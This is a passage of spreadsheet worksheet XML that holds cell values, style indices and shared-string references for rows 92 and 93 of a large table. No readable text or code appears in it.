      <c r="AA92" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB92" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC92" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD92" s="83"/>
      <c r="AE92" s="83"/>
      <c r="AF92" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG92" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH92" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI92" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ92" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK92" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL92" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM92" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN92" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO92" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP92" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ92" s="646">
        <v>17</v>
      </c>
      <c r="AR92" s="100"/>
      <c r="AS92" s="100">
        <v>8</v>
      </c>
      <c r="AT92" s="100">
        <v>0</v>
      </c>
      <c r="AU92" s="100">
        <v>8</v>
      </c>
      <c r="AV92" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW92" s="100">
        <v>8</v>
      </c>
      <c r="AX92" s="100">
        <v>8</v>
      </c>
      <c r="AY92" s="100">
        <v>0</v>
      </c>
      <c r="AZ92" s="100">
        <v>8</v>
      </c>
      <c r="BA92" s="381" t="s">
        <v>4907</v>
      </c>
      <c r="BB92" s="101">
        <v>13</v>
      </c>
      <c r="BC92" s="102" t="s">
        <v>1824</v>
      </c>
      <c r="BD92" s="102">
        <v>2</v>
      </c>
      <c r="BE92" s="103" t="s">
        <v>336</v>
      </c>
      <c r="BF92" s="103">
        <v>1</v>
      </c>
      <c r="BG92" s="104">
        <v>2</v>
      </c>
      <c r="BH92" s="190">
        <v>14</v>
      </c>
      <c r="BI92" s="191" t="s">
        <v>3787</v>
      </c>
      <c r="BJ92" s="498">
        <v>4</v>
      </c>
      <c r="BK92" s="192" t="s">
        <v>3788</v>
      </c>
      <c r="BL92" s="192">
        <v>4</v>
      </c>
      <c r="BM92" s="108">
        <v>2</v>
      </c>
      <c r="BN92" s="109">
        <v>27</v>
      </c>
      <c r="BO92" s="110" t="s">
        <v>2053</v>
      </c>
      <c r="BP92" s="501">
        <v>6</v>
      </c>
      <c r="BQ92" s="111" t="s">
        <v>2054</v>
      </c>
      <c r="BR92" s="111">
        <v>5</v>
      </c>
      <c r="BS92" s="112">
        <v>3</v>
      </c>
      <c r="BT92" s="113">
        <v>23</v>
      </c>
      <c r="BU92" s="114" t="s">
        <v>3789</v>
      </c>
      <c r="BV92" s="503">
        <v>7</v>
      </c>
      <c r="BW92" s="115" t="s">
        <v>3790</v>
      </c>
      <c r="BX92" s="115">
        <v>6</v>
      </c>
      <c r="BY92" s="116">
        <v>4</v>
      </c>
      <c r="BZ92" s="250">
        <v>40</v>
      </c>
      <c r="CA92" s="251" t="s">
        <v>3791</v>
      </c>
      <c r="CB92" s="505">
        <v>30</v>
      </c>
      <c r="CC92" s="252" t="s">
        <v>3792</v>
      </c>
      <c r="CD92" s="252">
        <v>28</v>
      </c>
      <c r="CE92" s="253">
        <v>5</v>
      </c>
      <c r="CF92" s="101">
        <v>63</v>
      </c>
      <c r="CG92" s="102" t="s">
        <v>3793</v>
      </c>
      <c r="CH92" s="102">
        <v>37</v>
      </c>
      <c r="CI92" s="103" t="s">
        <v>3794</v>
      </c>
      <c r="CJ92" s="103">
        <v>34</v>
      </c>
      <c r="CK92" s="104">
        <v>6</v>
      </c>
      <c r="CL92" s="190">
        <v>0</v>
      </c>
      <c r="CM92" s="191">
        <v>0</v>
      </c>
      <c r="CN92" s="498">
        <v>0</v>
      </c>
      <c r="CO92" s="192">
        <v>0</v>
      </c>
      <c r="CP92" s="192">
        <v>0</v>
      </c>
      <c r="CQ92" s="108">
        <v>0</v>
      </c>
      <c r="CR92" s="109">
        <v>2</v>
      </c>
      <c r="CS92" s="110" t="s">
        <v>1964</v>
      </c>
      <c r="CT92" s="501">
        <v>2</v>
      </c>
      <c r="CU92" s="111" t="s">
        <v>1965</v>
      </c>
      <c r="CV92" s="111">
        <v>2</v>
      </c>
      <c r="CW92" s="112">
        <v>2</v>
      </c>
      <c r="CX92" s="113">
        <v>29</v>
      </c>
      <c r="CY92" s="114" t="s">
        <v>2191</v>
      </c>
      <c r="CZ92" s="503">
        <v>8</v>
      </c>
      <c r="DA92" s="115" t="s">
        <v>2192</v>
      </c>
      <c r="DB92" s="115">
        <v>7</v>
      </c>
      <c r="DC92" s="116">
        <v>5</v>
      </c>
      <c r="DD92" s="101">
        <v>0</v>
      </c>
      <c r="DE92" s="102">
        <v>0</v>
      </c>
      <c r="DF92" s="102">
        <v>0</v>
      </c>
      <c r="DG92" s="103">
        <v>0</v>
      </c>
      <c r="DH92" s="103">
        <v>0</v>
      </c>
      <c r="DI92" s="104">
        <v>0</v>
      </c>
      <c r="DJ92" s="190">
        <v>1</v>
      </c>
      <c r="DK92" s="191" t="s">
        <v>3795</v>
      </c>
      <c r="DL92" s="498">
        <v>1</v>
      </c>
      <c r="DM92" s="192" t="s">
        <v>3796</v>
      </c>
      <c r="DN92" s="192">
        <v>1</v>
      </c>
      <c r="DO92" s="108">
        <v>1</v>
      </c>
      <c r="DP92" s="109">
        <v>1</v>
      </c>
      <c r="DQ92" s="110" t="s">
        <v>3795</v>
      </c>
      <c r="DR92" s="501">
        <v>1</v>
      </c>
      <c r="DS92" s="111" t="s">
        <v>3796</v>
      </c>
      <c r="DT92" s="111">
        <v>1</v>
      </c>
      <c r="DU92" s="112">
        <v>1</v>
      </c>
      <c r="DV92" s="113">
        <v>8</v>
      </c>
      <c r="DW92" s="114" t="s">
        <v>3797</v>
      </c>
      <c r="DX92" s="503">
        <v>3</v>
      </c>
      <c r="DY92" s="115" t="s">
        <v>3798</v>
      </c>
      <c r="DZ92" s="115">
        <v>3</v>
      </c>
      <c r="EA92" s="116">
        <v>1</v>
      </c>
      <c r="EB92" s="250">
        <v>2</v>
      </c>
      <c r="EC92" s="251" t="s">
        <v>3799</v>
      </c>
      <c r="ED92" s="505">
        <v>2</v>
      </c>
      <c r="EE92" s="252" t="s">
        <v>3800</v>
      </c>
      <c r="EF92" s="252">
        <v>2</v>
      </c>
      <c r="EG92" s="253">
        <v>2</v>
      </c>
      <c r="EH92" s="101">
        <v>10</v>
      </c>
      <c r="EI92" s="102" t="s">
        <v>3801</v>
      </c>
      <c r="EJ92" s="102">
        <v>5</v>
      </c>
      <c r="EK92" s="103" t="s">
        <v>3802</v>
      </c>
      <c r="EL92" s="103">
        <v>5</v>
      </c>
      <c r="EM92" s="104">
        <v>2</v>
      </c>
      <c r="EN92" s="190">
        <v>0</v>
      </c>
      <c r="EO92" s="191">
        <v>0</v>
      </c>
      <c r="EP92" s="498">
        <v>0</v>
      </c>
      <c r="EQ92" s="192">
        <v>0</v>
      </c>
      <c r="ER92" s="192">
        <v>0</v>
      </c>
      <c r="ES92" s="108">
        <v>0</v>
      </c>
      <c r="ET92" s="109">
        <v>0</v>
      </c>
      <c r="EU92" s="110">
        <v>0</v>
      </c>
      <c r="EV92" s="501">
        <v>0</v>
      </c>
      <c r="EW92" s="111">
        <v>0</v>
      </c>
      <c r="EX92" s="111">
        <v>0</v>
      </c>
      <c r="EY92" s="112">
        <v>0</v>
      </c>
      <c r="EZ92" s="113">
        <v>1</v>
      </c>
      <c r="FA92" s="114" t="s">
        <v>3795</v>
      </c>
      <c r="FB92" s="503">
        <v>1</v>
      </c>
      <c r="FC92" s="115" t="s">
        <v>3796</v>
      </c>
      <c r="FD92" s="115">
        <v>1</v>
      </c>
      <c r="FE92" s="116">
        <v>1</v>
      </c>
      <c r="FF92" s="101">
        <v>13</v>
      </c>
      <c r="FG92" s="102" t="s">
        <v>1824</v>
      </c>
      <c r="FH92" s="102">
        <v>2</v>
      </c>
      <c r="FI92" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ92" s="103">
        <v>1</v>
      </c>
      <c r="FK92" s="104">
        <v>2</v>
      </c>
      <c r="FL92" s="190">
        <v>13</v>
      </c>
      <c r="FM92" s="191" t="s">
        <v>3803</v>
      </c>
      <c r="FN92" s="498">
        <v>3</v>
      </c>
      <c r="FO92" s="192" t="s">
        <v>3804</v>
      </c>
      <c r="FP92" s="192">
        <v>3</v>
      </c>
      <c r="FQ92" s="108">
        <v>1</v>
      </c>
      <c r="FR92" s="109">
        <v>26</v>
      </c>
      <c r="FS92" s="110" t="s">
        <v>3805</v>
      </c>
      <c r="FT92" s="501">
        <v>5</v>
      </c>
      <c r="FU92" s="111" t="s">
        <v>3806</v>
      </c>
      <c r="FV92" s="111">
        <v>4</v>
      </c>
      <c r="FW92" s="112">
        <v>2</v>
      </c>
      <c r="FX92" s="113">
        <v>13</v>
      </c>
      <c r="FY92" s="114" t="s">
        <v>1824</v>
      </c>
      <c r="FZ92" s="503">
        <v>2</v>
      </c>
      <c r="GA92" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB92" s="115">
        <v>1</v>
      </c>
      <c r="GC92" s="116">
        <v>2</v>
      </c>
      <c r="GD92" s="250">
        <v>19</v>
      </c>
      <c r="GE92" s="251" t="s">
        <v>3807</v>
      </c>
      <c r="GF92" s="505">
        <v>9</v>
      </c>
      <c r="GG92" s="252" t="s">
        <v>3808</v>
      </c>
      <c r="GH92" s="252">
        <v>7</v>
      </c>
      <c r="GI92" s="253">
        <v>4</v>
      </c>
      <c r="GJ92" s="101">
        <v>32</v>
      </c>
      <c r="GK92" s="102" t="s">
        <v>3809</v>
      </c>
      <c r="GL92" s="102">
        <v>11</v>
      </c>
      <c r="GM92" s="103" t="s">
        <v>3810</v>
      </c>
      <c r="GN92" s="103">
        <v>8</v>
      </c>
      <c r="GO92" s="104">
        <v>5</v>
      </c>
      <c r="GP92" s="190">
        <v>0</v>
      </c>
      <c r="GQ92" s="191">
        <v>0</v>
      </c>
      <c r="GR92" s="498">
        <v>0</v>
      </c>
      <c r="GS92" s="192">
        <v>0</v>
      </c>
      <c r="GT92" s="192">
        <v>0</v>
      </c>
      <c r="GU92" s="108">
        <v>0</v>
      </c>
      <c r="GV92" s="109">
        <v>0</v>
      </c>
      <c r="GW92" s="110">
        <v>0</v>
      </c>
      <c r="GX92" s="501">
        <v>0</v>
      </c>
      <c r="GY92" s="111">
        <v>0</v>
      </c>
      <c r="GZ92" s="111">
        <v>0</v>
      </c>
      <c r="HA92" s="112">
        <v>0</v>
      </c>
      <c r="HB92" s="113">
        <v>26</v>
      </c>
      <c r="HC92" s="114" t="s">
        <v>3805</v>
      </c>
      <c r="HD92" s="503">
        <v>5</v>
      </c>
      <c r="HE92" s="115" t="s">
        <v>3806</v>
      </c>
      <c r="HF92" s="115">
        <v>4</v>
      </c>
      <c r="HG92" s="116">
        <v>2</v>
      </c>
      <c r="HH92" s="101">
        <v>0</v>
      </c>
      <c r="HI92" s="102">
        <v>0</v>
      </c>
      <c r="HJ92" s="102">
        <v>0</v>
      </c>
      <c r="HK92" s="103">
        <v>0</v>
      </c>
      <c r="HL92" s="103">
        <v>0</v>
      </c>
      <c r="HM92" s="104">
        <v>0</v>
      </c>
      <c r="HN92" s="190">
        <v>0</v>
      </c>
      <c r="HO92" s="191">
        <v>0</v>
      </c>
      <c r="HP92" s="498">
        <v>0</v>
      </c>
      <c r="HQ92" s="192">
        <v>0</v>
      </c>
      <c r="HR92" s="192">
        <v>0</v>
      </c>
      <c r="HS92" s="108">
        <v>0</v>
      </c>
      <c r="HT92" s="109">
        <v>0</v>
      </c>
      <c r="HU92" s="110">
        <v>0</v>
      </c>
      <c r="HV92" s="501">
        <v>0</v>
      </c>
      <c r="HW92" s="111">
        <v>0</v>
      </c>
      <c r="HX92" s="111">
        <v>0</v>
      </c>
      <c r="HY92" s="112">
        <v>0</v>
      </c>
      <c r="HZ92" s="113">
        <v>2</v>
      </c>
      <c r="IA92" s="114" t="s">
        <v>1964</v>
      </c>
      <c r="IB92" s="503">
        <v>2</v>
      </c>
      <c r="IC92" s="115" t="s">
        <v>1965</v>
      </c>
      <c r="ID92" s="115">
        <v>2</v>
      </c>
      <c r="IE92" s="116">
        <v>2</v>
      </c>
      <c r="IF92" s="250">
        <v>19</v>
      </c>
      <c r="IG92" s="251" t="s">
        <v>3811</v>
      </c>
      <c r="IH92" s="505">
        <v>19</v>
      </c>
      <c r="II92" s="252" t="s">
        <v>3812</v>
      </c>
      <c r="IJ92" s="252">
        <v>19</v>
      </c>
      <c r="IK92" s="253">
        <v>3</v>
      </c>
      <c r="IL92" s="101">
        <v>21</v>
      </c>
      <c r="IM92" s="102" t="s">
        <v>3813</v>
      </c>
      <c r="IN92" s="102">
        <v>21</v>
      </c>
      <c r="IO92" s="103" t="s">
        <v>3814</v>
      </c>
      <c r="IP92" s="103">
        <v>21</v>
      </c>
      <c r="IQ92" s="104">
        <v>3</v>
      </c>
      <c r="IR92" s="190">
        <v>0</v>
      </c>
      <c r="IS92" s="191">
        <v>0</v>
      </c>
      <c r="IT92" s="498">
        <v>0</v>
      </c>
      <c r="IU92" s="192">
        <v>0</v>
      </c>
      <c r="IV92" s="192">
        <v>0</v>
      </c>
      <c r="IW92" s="108">
        <v>0</v>
      </c>
      <c r="IX92" s="109">
        <v>2</v>
      </c>
      <c r="IY92" s="110" t="s">
        <v>1964</v>
      </c>
      <c r="IZ92" s="501">
        <v>2</v>
      </c>
      <c r="JA92" s="111" t="s">
        <v>1965</v>
      </c>
      <c r="JB92" s="111">
        <v>2</v>
      </c>
      <c r="JC92" s="112">
        <v>2</v>
      </c>
      <c r="JD92" s="113">
        <v>2</v>
      </c>
      <c r="JE92" s="114" t="s">
        <v>1964</v>
      </c>
      <c r="JF92" s="503">
        <v>2</v>
      </c>
      <c r="JG92" s="115" t="s">
        <v>1965</v>
      </c>
      <c r="JH92" s="115">
        <v>2</v>
      </c>
      <c r="JI92" s="116">
        <v>2</v>
      </c>
      <c r="JJ92" s="101">
        <v>0</v>
      </c>
      <c r="JK92" s="102">
        <v>0</v>
      </c>
      <c r="JL92" s="102">
        <v>0</v>
      </c>
      <c r="JM92" s="103">
        <v>0</v>
      </c>
      <c r="JN92" s="103">
        <v>0</v>
      </c>
      <c r="JO92" s="104">
        <v>0</v>
      </c>
      <c r="JP92" s="190">
        <v>0</v>
      </c>
      <c r="JQ92" s="191">
        <v>0</v>
      </c>
      <c r="JR92" s="498">
        <v>0</v>
      </c>
      <c r="JS92" s="192">
        <v>0</v>
      </c>
      <c r="JT92" s="192">
        <v>0</v>
      </c>
      <c r="JU92" s="108">
        <v>0</v>
      </c>
      <c r="JV92" s="109">
        <v>0</v>
      </c>
      <c r="JW92" s="110">
        <v>0</v>
      </c>
      <c r="JX92" s="501">
        <v>0</v>
      </c>
      <c r="JY92" s="111">
        <v>0</v>
      </c>
      <c r="JZ92" s="111">
        <v>0</v>
      </c>
      <c r="KA92" s="112">
        <v>0</v>
      </c>
      <c r="KB92" s="113">
        <v>0</v>
      </c>
      <c r="KC92" s="114">
        <v>0</v>
      </c>
      <c r="KD92" s="503">
        <v>0</v>
      </c>
      <c r="KE92" s="115">
        <v>0</v>
      </c>
      <c r="KF92" s="115">
        <v>0</v>
      </c>
      <c r="KG92" s="116">
        <v>0</v>
      </c>
      <c r="KH92" s="250">
        <v>0</v>
      </c>
      <c r="KI92" s="251">
        <v>0</v>
      </c>
      <c r="KJ92" s="505">
        <v>0</v>
      </c>
      <c r="KK92" s="252">
        <v>0</v>
      </c>
      <c r="KL92" s="252">
        <v>0</v>
      </c>
      <c r="KM92" s="253">
        <v>0</v>
      </c>
      <c r="KN92" s="101">
        <v>0</v>
      </c>
      <c r="KO92" s="102">
        <v>0</v>
      </c>
      <c r="KP92" s="102">
        <v>0</v>
      </c>
      <c r="KQ92" s="103">
        <v>0</v>
      </c>
      <c r="KR92" s="103">
        <v>0</v>
      </c>
      <c r="KS92" s="104">
        <v>0</v>
      </c>
      <c r="KT92" s="190">
        <v>0</v>
      </c>
      <c r="KU92" s="191">
        <v>0</v>
      </c>
      <c r="KV92" s="498">
        <v>0</v>
      </c>
      <c r="KW92" s="192">
        <v>0</v>
      </c>
      <c r="KX92" s="192">
        <v>0</v>
      </c>
      <c r="KY92" s="108">
        <v>0</v>
      </c>
      <c r="KZ92" s="109">
        <v>0</v>
      </c>
      <c r="LA92" s="110">
        <v>0</v>
      </c>
      <c r="LB92" s="501">
        <v>0</v>
      </c>
      <c r="LC92" s="111">
        <v>0</v>
      </c>
      <c r="LD92" s="111">
        <v>0</v>
      </c>
      <c r="LE92" s="112">
        <v>0</v>
      </c>
      <c r="LF92" s="113">
        <v>0</v>
      </c>
      <c r="LG92" s="114">
        <v>0</v>
      </c>
      <c r="LH92" s="503">
        <v>0</v>
      </c>
      <c r="LI92" s="115">
        <v>0</v>
      </c>
      <c r="LJ92" s="115">
        <v>0</v>
      </c>
      <c r="LK92" s="116">
        <v>0</v>
      </c>
      <c r="LL92" s="117">
        <v>15</v>
      </c>
      <c r="LM92" s="507">
        <v>14</v>
      </c>
      <c r="LN92" s="119">
        <v>0</v>
      </c>
      <c r="LO92" s="119">
        <v>9</v>
      </c>
      <c r="LP92" s="119">
        <v>10</v>
      </c>
      <c r="LQ92" s="119">
        <v>0</v>
      </c>
      <c r="LR92" s="119">
        <v>10</v>
      </c>
      <c r="LS92" s="119">
        <v>10</v>
      </c>
      <c r="LT92" s="382"/>
      <c r="LU92" s="117">
        <v>0</v>
      </c>
      <c r="LV92" s="118">
        <v>0</v>
      </c>
      <c r="LW92" s="507">
        <v>0</v>
      </c>
      <c r="LX92" s="119">
        <v>0</v>
      </c>
      <c r="LY92" s="119">
        <v>0</v>
      </c>
      <c r="LZ92" s="119">
        <v>0</v>
      </c>
      <c r="MA92" s="117">
        <v>0</v>
      </c>
      <c r="MB92" s="118">
        <v>0</v>
      </c>
      <c r="MC92" s="507">
        <v>0</v>
      </c>
      <c r="MD92" s="119">
        <v>0</v>
      </c>
      <c r="ME92" s="119">
        <v>0</v>
      </c>
      <c r="MF92" s="119">
        <v>0</v>
      </c>
      <c r="MG92" s="117">
        <v>0</v>
      </c>
      <c r="MH92" s="118">
        <v>0</v>
      </c>
      <c r="MI92" s="507">
        <v>0</v>
      </c>
      <c r="MJ92" s="119">
        <v>0</v>
      </c>
      <c r="MK92" s="119">
        <v>0</v>
      </c>
      <c r="ML92" s="119">
        <v>0</v>
      </c>
      <c r="MM92" s="117">
        <v>0</v>
      </c>
      <c r="MN92" s="118">
        <v>0</v>
      </c>
      <c r="MO92" s="507">
        <v>0</v>
      </c>
      <c r="MP92" s="119">
        <v>0</v>
      </c>
      <c r="MQ92" s="119">
        <v>0</v>
      </c>
      <c r="MR92" s="119">
        <v>0</v>
      </c>
      <c r="MS92" s="117">
        <v>0</v>
      </c>
      <c r="MT92" s="118">
        <v>0</v>
      </c>
      <c r="MU92" s="507">
        <v>0</v>
      </c>
      <c r="MV92" s="119">
        <v>0</v>
      </c>
      <c r="MW92" s="119">
        <v>0</v>
      </c>
      <c r="MX92" s="119">
        <v>0</v>
      </c>
      <c r="MY92" s="117">
        <v>0</v>
      </c>
      <c r="MZ92" s="118">
        <v>0</v>
      </c>
      <c r="NA92" s="507">
        <v>0</v>
      </c>
      <c r="NB92" s="119">
        <v>0</v>
      </c>
      <c r="NC92" s="119">
        <v>0</v>
      </c>
      <c r="ND92" s="119">
        <v>0</v>
      </c>
      <c r="NE92" s="117">
        <v>2</v>
      </c>
      <c r="NF92" s="118" t="s">
        <v>4166</v>
      </c>
      <c r="NG92" s="507">
        <v>1</v>
      </c>
      <c r="NH92" s="119" t="s">
        <v>2538</v>
      </c>
      <c r="NI92" s="119">
        <v>1</v>
      </c>
      <c r="NJ92" s="119">
        <v>1</v>
      </c>
      <c r="NK92" s="117">
        <v>0</v>
      </c>
      <c r="NL92" s="118">
        <v>0</v>
      </c>
      <c r="NM92" s="507">
        <v>0</v>
      </c>
      <c r="NN92" s="119">
        <v>0</v>
      </c>
      <c r="NO92" s="119">
        <v>0</v>
      </c>
      <c r="NP92" s="119">
        <v>0</v>
      </c>
      <c r="NQ92" s="117">
        <v>3</v>
      </c>
      <c r="NR92" s="118" t="s">
        <v>4414</v>
      </c>
      <c r="NS92" s="507">
        <v>3</v>
      </c>
      <c r="NT92" s="119" t="s">
        <v>4274</v>
      </c>
      <c r="NU92" s="119">
        <v>2</v>
      </c>
      <c r="NV92" s="119">
        <v>3</v>
      </c>
      <c r="NW92" s="117">
        <v>10</v>
      </c>
      <c r="NX92" s="118" t="s">
        <v>4415</v>
      </c>
      <c r="NY92" s="507">
        <v>10</v>
      </c>
      <c r="NZ92" s="119" t="s">
        <v>4416</v>
      </c>
      <c r="OA92" s="119">
        <v>6</v>
      </c>
      <c r="OB92" s="119">
        <v>8</v>
      </c>
      <c r="OC92" s="120">
        <v>2</v>
      </c>
      <c r="OD92" s="120">
        <v>2</v>
      </c>
      <c r="OE92" s="120">
        <v>2</v>
      </c>
      <c r="OF92" s="121">
        <v>2</v>
      </c>
      <c r="OG92" s="120">
        <v>1</v>
      </c>
      <c r="OH92" s="120">
        <v>1</v>
      </c>
      <c r="OI92" s="120">
        <v>1</v>
      </c>
      <c r="OJ92" s="120">
        <v>1</v>
      </c>
      <c r="OK92" s="383"/>
      <c r="OL92" s="120">
        <v>2</v>
      </c>
      <c r="OM92" s="120">
        <v>2</v>
      </c>
      <c r="ON92" s="120">
        <v>2</v>
      </c>
      <c r="OO92" s="120" t="s">
        <v>3815</v>
      </c>
      <c r="OP92" s="120">
        <v>2</v>
      </c>
      <c r="OQ92" s="464">
        <v>1</v>
      </c>
      <c r="OR92" s="120">
        <v>0</v>
      </c>
      <c r="OS92" s="120">
        <v>0</v>
      </c>
      <c r="OT92" s="120">
        <v>0</v>
      </c>
      <c r="OU92" s="120"/>
      <c r="OV92" s="120">
        <v>0</v>
      </c>
      <c r="OW92" s="464">
        <v>0</v>
      </c>
      <c r="OX92" s="120">
        <v>0</v>
      </c>
      <c r="OY92" s="120">
        <v>0</v>
      </c>
      <c r="OZ92" s="120">
        <v>0</v>
      </c>
      <c r="PA92" s="120"/>
      <c r="PB92" s="120">
        <v>0</v>
      </c>
      <c r="PC92" s="464">
        <v>0</v>
      </c>
      <c r="PD92" s="120">
        <v>0</v>
      </c>
      <c r="PE92" s="120">
        <v>0</v>
      </c>
      <c r="PF92" s="120">
        <v>0</v>
      </c>
      <c r="PG92" s="120"/>
      <c r="PH92" s="120">
        <v>0</v>
      </c>
      <c r="PI92" s="464">
        <v>0</v>
      </c>
      <c r="PJ92" s="120">
        <v>0</v>
      </c>
      <c r="PK92" s="120">
        <v>0</v>
      </c>
      <c r="PL92" s="120">
        <v>0</v>
      </c>
      <c r="PM92" s="120"/>
      <c r="PN92" s="120">
        <v>0</v>
      </c>
      <c r="PO92" s="464">
        <v>0</v>
      </c>
      <c r="PP92" s="120">
        <v>0</v>
      </c>
      <c r="PQ92" s="120">
        <v>0</v>
      </c>
      <c r="PR92" s="120">
        <v>0</v>
      </c>
      <c r="PS92" s="120"/>
      <c r="PT92" s="120">
        <v>0</v>
      </c>
      <c r="PU92" s="464">
        <v>0</v>
      </c>
      <c r="PV92" s="120">
        <v>1</v>
      </c>
      <c r="PW92" s="120">
        <v>1</v>
      </c>
      <c r="PX92" s="120">
        <v>1</v>
      </c>
      <c r="PY92" s="120" t="s">
        <v>3898</v>
      </c>
      <c r="PZ92" s="120">
        <v>1</v>
      </c>
      <c r="QA92" s="464">
        <v>1</v>
      </c>
      <c r="QB92" s="120">
        <v>1</v>
      </c>
      <c r="QC92" s="120">
        <v>1</v>
      </c>
      <c r="QD92" s="120">
        <v>1</v>
      </c>
      <c r="QE92" s="120" t="s">
        <v>2541</v>
      </c>
      <c r="QF92" s="120">
        <v>1</v>
      </c>
      <c r="QG92" s="464">
        <v>1</v>
      </c>
      <c r="QH92" s="120">
        <v>0</v>
      </c>
      <c r="QI92" s="120">
        <v>0</v>
      </c>
      <c r="QJ92" s="120">
        <v>0</v>
      </c>
      <c r="QK92" s="120"/>
      <c r="QL92" s="120">
        <v>0</v>
      </c>
      <c r="QM92" s="464">
        <v>0</v>
      </c>
      <c r="QN92" s="120">
        <v>0</v>
      </c>
      <c r="QO92" s="120">
        <v>0</v>
      </c>
      <c r="QP92" s="120">
        <v>0</v>
      </c>
      <c r="QQ92" s="120"/>
      <c r="QR92" s="120">
        <v>0</v>
      </c>
      <c r="QS92" s="464">
        <v>0</v>
      </c>
      <c r="QT92" s="184"/>
      <c r="QU92" s="184"/>
      <c r="QV92" s="184"/>
      <c r="QW92" s="184"/>
      <c r="QX92" s="184"/>
      <c r="QY92" s="184"/>
      <c r="QZ92" s="184"/>
      <c r="RA92" s="184"/>
      <c r="RB92" s="184"/>
      <c r="RC92" s="184"/>
      <c r="RD92" s="184"/>
      <c r="RE92" s="184"/>
      <c r="RF92" s="184"/>
      <c r="RG92" s="184"/>
      <c r="RH92" s="184"/>
      <c r="RI92" s="184"/>
      <c r="RJ92" s="184"/>
      <c r="RK92" s="184"/>
      <c r="RL92" s="184"/>
      <c r="RM92" s="184"/>
      <c r="RN92" s="184"/>
      <c r="RO92" s="184"/>
      <c r="RP92" s="184"/>
      <c r="RQ92" s="184"/>
      <c r="RR92" s="184"/>
      <c r="RS92" s="184"/>
      <c r="RT92" s="184"/>
      <c r="RU92" s="184"/>
      <c r="RV92" s="184"/>
      <c r="RW92" s="184"/>
      <c r="RX92" s="184"/>
      <c r="RY92" s="184"/>
      <c r="RZ92" s="184"/>
      <c r="SA92" s="184"/>
      <c r="SB92" s="184"/>
      <c r="SC92" s="184"/>
      <c r="SD92" s="184"/>
      <c r="SE92" s="184"/>
      <c r="SF92" s="184"/>
      <c r="SG92" s="184"/>
      <c r="SH92" s="184"/>
      <c r="SI92" s="184"/>
      <c r="SJ92" s="184"/>
      <c r="SK92" s="184"/>
      <c r="SL92" s="184"/>
      <c r="SM92" s="184"/>
      <c r="SN92" s="184"/>
      <c r="SO92" s="184"/>
      <c r="SP92" s="184"/>
      <c r="SQ92" s="184"/>
      <c r="SR92" s="184"/>
      <c r="SS92" s="184"/>
      <c r="ST92" s="184"/>
      <c r="SU92" s="184"/>
      <c r="SV92" s="184"/>
      <c r="SW92" s="184"/>
      <c r="SX92" s="184"/>
      <c r="SY92" s="184"/>
      <c r="SZ92" s="184"/>
      <c r="TA92" s="184"/>
      <c r="TB92" s="184"/>
      <c r="TC92" s="184"/>
      <c r="TD92" s="184"/>
      <c r="TE92" s="184"/>
      <c r="TF92" s="184"/>
      <c r="TG92" s="184"/>
      <c r="TH92" s="184"/>
      <c r="TI92" s="184"/>
      <c r="TJ92" s="184"/>
      <c r="TK92" s="184"/>
      <c r="TL92" s="184"/>
      <c r="TM92" s="184"/>
      <c r="TN92" s="184"/>
      <c r="TO92" s="184"/>
      <c r="TP92" s="184"/>
      <c r="TQ92" s="184"/>
      <c r="TR92" s="184"/>
      <c r="TS92" s="184"/>
      <c r="TT92" s="184"/>
      <c r="TU92" s="184"/>
      <c r="TV92" s="184"/>
      <c r="TW92" s="184"/>
      <c r="TX92" s="184"/>
      <c r="TY92" s="184"/>
      <c r="TZ92" s="184"/>
      <c r="UA92" s="184"/>
      <c r="UB92" s="184"/>
      <c r="UC92" s="184"/>
      <c r="UD92" s="184"/>
      <c r="UE92" s="184"/>
      <c r="UF92" s="184"/>
      <c r="UG92" s="184"/>
      <c r="UH92" s="184"/>
      <c r="UI92" s="184"/>
      <c r="UJ92" s="184"/>
      <c r="UK92" s="184"/>
      <c r="UL92" s="184"/>
      <c r="UM92" s="184"/>
      <c r="UN92" s="184"/>
      <c r="UO92" s="184"/>
      <c r="UP92" s="184"/>
      <c r="UQ92" s="184"/>
      <c r="UR92" s="184"/>
      <c r="US92" s="184"/>
      <c r="UT92" s="184"/>
      <c r="UU92" s="184"/>
      <c r="UV92" s="184"/>
      <c r="UW92" s="184"/>
      <c r="UX92" s="184"/>
      <c r="UY92" s="184"/>
      <c r="UZ92" s="184"/>
      <c r="VA92" s="184"/>
      <c r="VB92" s="184"/>
      <c r="VC92" s="184"/>
      <c r="VD92" s="184"/>
      <c r="VE92" s="184"/>
      <c r="VF92" s="184"/>
      <c r="VG92" s="184"/>
      <c r="VH92" s="184"/>
      <c r="VI92" s="184"/>
      <c r="VJ92" s="184"/>
      <c r="VK92" s="184"/>
      <c r="VL92" s="184"/>
      <c r="VM92" s="184"/>
      <c r="VN92" s="184"/>
      <c r="VO92" s="184"/>
      <c r="VP92" s="184"/>
      <c r="VQ92" s="184"/>
      <c r="VR92" s="184"/>
      <c r="VS92" s="184"/>
      <c r="VT92" s="184"/>
      <c r="VU92" s="184"/>
      <c r="VV92" s="184"/>
      <c r="VW92" s="184"/>
      <c r="VX92" s="184"/>
      <c r="VY92" s="184"/>
    </row>
    <row r="93" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A93" s="82" t="s">
        <v>22</v>
      </c>
      <c r="B93" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C93" s="83" t="s">
        <v>327</v>
      </c>
      <c r="D93" s="83" t="s">
        <v>138</v>
      </c>
      <c r="E93" s="83">
        <f t="shared" si="5"/>
        <v>61</v>
      </c>
      <c r="F93" s="83" t="s">
        <v>139</v>
      </c>
      <c r="G93" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H93" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I93" s="81" t="s">
        <v>1552</v>
      </c>
      <c r="J93" s="85" t="s">
        <v>838</v>
